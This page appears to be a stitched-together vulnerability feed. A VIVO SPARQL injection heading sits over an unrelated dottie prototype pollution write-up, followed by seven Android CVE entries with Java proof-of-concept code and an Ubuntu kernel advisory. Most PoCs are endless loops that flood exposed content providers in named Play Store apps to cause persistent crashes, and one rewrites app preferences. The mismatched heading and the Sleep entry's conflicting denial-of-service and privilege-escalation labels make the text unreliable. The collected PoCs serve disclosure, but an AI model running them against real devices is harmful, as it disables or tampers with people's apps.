Proof of concept exploit for a SPARQL injection vulnerability in VIVO that triggers a denial of service.

VIVO SPARQL Injection

Versions of the package dottie before 2.0.4 are vulnerable to Prototype Pollution due to insufficient checks, via the set() function and the current variable in the /dottie.js file.

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

*   Unsafe Object recursive merge
    
*   Property definition by path
    

**Unsafe Object recursive merge**

The logic of a vulnerable recursive merge function follows the following high-level model:

    merge (target, source)
    
      foreach property of source
    if property exists and is an object on both the target and the source
    
      merge(target[property], source[property])
    
    else
    
      target[property] = source[property]
    
    

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

**Property definition by path**

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

CVE-2023-26132: Snyk Vulnerability Database | Snyk

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Yandex Navigator（CVE-2023-29751）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

while (true) {
    ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
    Intent intent = new Intent();
    intent.setComponent(componentName);
    intent.putExtra("service\_version", 0);
    intent.setAction("ru.yandex.common.clid.update\_preferences");
    intent.putExtra("preferences", "STORAGE");
    intent.putExtra("application", "ru.yandex.yandexnavi");
    Bundle bundle = new Bundle();
    Bundle bundle2 = new Bundle();
    Bundle bundle3 = new Bundle();
    String randomString = getRandomString(50240);
    bundle2.putString(randomString, randomString);
    bundle3.putLong(randomString, Long.MAX\_VALUE);
    bundle.putBundle("bundle-values", bundle2);
    bundle.putBundle("bundle-time", bundle3);
    intent.putExtra("bundle", bundle);
    ServiceConnection connection = new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service){
        
        }
        @Override
        public void onServiceDisconnected(ComponentName name) {
            
        }
    };
    bindService(intent,connection,BIND\_AUTO\_CREATE);
}

CVE-2023-29751: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows a local attacker to cause a denial of service via the SharedPreference files.

**Denial of Service exists in Facemoji Emoji Keyboard（CVE-2023-29753）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows a local attacker to cause a denial of service via the SharedPreference files.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
      //targetSharedPreferencesName: any sharedpreferences's name in the app
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/targetShardPreferencesName/xxx");
        while (true){
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key",randomString);
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

CVE-2023-29753: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Twilight（CVE-2023-29756）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
while(true){
    ContentValues contentValues = new ContentValues();
    String string = getRandomString(10000);
    contentValues.put(string,string);
    contentResolver.insert(parse,contentValues);
}

CVE-2023-29756: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Blue Light Filter（CVE-2023-29758）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

 public void attack\_eye() {
        while(true) {
            ContentResolver contentResolver = getContentResolver();
            ContentValues contentValues = new ContentValues();
            Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
            String randomString = getRandomString(1000);
            contentValues.put(randomString,randomString);
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29758: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in FlightAware v.5.8.0 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the database files.

**Denial of Service exists in FlightAware（CVE-2023-29759）**

Vendor: FlightAware(https://flightaware.com/)

Affected product: FlightAware(com.flightaware.android.liveFlightTracker)

Version: 5.8.0

Download link： https://play.google.com/store/apps/details?id=com.flightaware.android.liveFlightTracker

Description of the vulnerability for use in the CVE：An issue found in FlightAware v.5.8.0 allows unauthorized apps to cause a persistent denial of service by manipulating the database files.

Additional information: The FlightAware application allows unauthorized applications to modify the data in its database files through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes.

poc:

public void attack\_flightware() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.flightaware.android.liveFlightTracker.FlightAwareContent/airlines");
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("url", getRandomString(10240));
            contentValues.put("name\_zh", getRandomString(10240));
            contentValues.put("iata", getRandomString(10240));
            contentValues.put("icao", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29759: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Sleep v.20230303 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Escalation of Privileges exists in Sleep（CVE-2023-29761）**

Vendor: Urbandroid(http://twilight.urbandroid.org/)

Affected product: Sleep(com.urbandroid.sleep)

Version: 20230303

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.sleep

Description of the vulnerability for use in the CVE：An issue found in Sleep v.20230303 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Sleep application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality.

Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as language, some displays of the interface, and also modify the uri of the alarm bell, resulting in an escalation of privilege attack.

poc:

public void attack\_sleep() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
        ContentValues contentValues = new ContentValues();
        contentValues.put(targetKey, targetValue);
        contentResolver.insert(parse, contentValues);
    }

CVE-2023-29761: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause a persistent denial of service via the database files.

**Denial of Service exists in CrossX（CVE-2023-29767）**

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause a persistent denial of service via the database files.

Additional information: The CrossX application allows unauthorized applications to inject data into the database via interfaces in the components it exposes, which will be loaded from the database into memory upon opening the app. Once an attacker injects an excessive amount of data, it can cause the application to trigger an OOM error and crash. The user cannot completely fix the above problem by restarting the application because the data is stored persistently in the database, which eventually leads to persistent denial of service.

poc:

 public void attack\_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb\_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29767: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Ubuntu Security Notice 6151-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

==========================================================================  
Ubuntu Security Notice USN-6151-1  
June 08, 2023

linux-xilinx-zynqmp vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that the KVM VMX implementation in the Linux kernel did  
not properly handle indirect branch prediction isolation between L1 and L2  
VMs. An attacker in a guest VM could use this to expose sensitive  
information from the host OS or other guest VMs. (CVE-2022-2196)

Gerald Lee discovered that the USB Gadget file system implementation in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability in some situations. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-4382)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1023-xilinx-zynqmp  5.4.0-1023.27

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6151-1  
   CVE-2021-3669, CVE-2022-2196, CVE-2022-4382, CVE-2023-23559

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1023.27

Tag

#dos